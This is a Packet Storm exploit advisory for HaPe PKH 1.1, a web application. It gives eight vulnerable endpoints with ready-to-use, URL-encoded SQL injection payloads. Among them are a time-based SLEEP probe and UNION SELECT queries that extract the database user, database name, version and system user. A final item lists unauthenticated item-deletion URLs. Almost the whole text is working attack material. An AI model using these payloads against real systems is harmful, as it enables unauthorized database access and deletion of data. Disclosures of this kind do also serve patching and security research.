HaPe PKH version 1.1 suffers from a remote SQL injection vulnerability.
da51a69dc53c62ded25e0230d961f6779f3388d1d5e56052ecead541886185d0# Exploit Title: HaPe PKH 1.1 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sitejo.id
# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# # 1) Everyone
# POST https://localhost/[PATH]/lap-anggota-kelompok-pdf.php HTTP/1.1
nama_kelompok=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
# 2) Everyone
# POST https://localhost/hape-pkh/lap-peserta-perdesa-pdf.php
desa=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
# 3) Everyone
# https://localhost/[PATH]/admin/media.php?module=desa&act=hapus&id=[SQL]
%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
# 4) Users
# https://localhost/[PATH]/admin/media.php?module=pengurus&act=print&id=[SQL]
%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
# 5) Users
# https://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]
&id=%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
# 6) Users
# https://localhost/[PATH]/admin/media.php?module=fasilitas&act=editfasilitas&id=[SQL]
%2d%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%53%59%53%54%45%4d%5f%55%53%45%52%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
# 7) Users
# https://localhost/[PATH]/admin/media.php?module=kelompok&act=editkelompok&id=[SQL]
%2d%31%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2d%2d%20%2d
# 8) Everyone
# Delete Item *
https://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=hapus&id=[ID]
https://localhost/[PATH]/admin/modul/mod_update/aksi_update.php?module=update&act=hapus&id=[ID]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed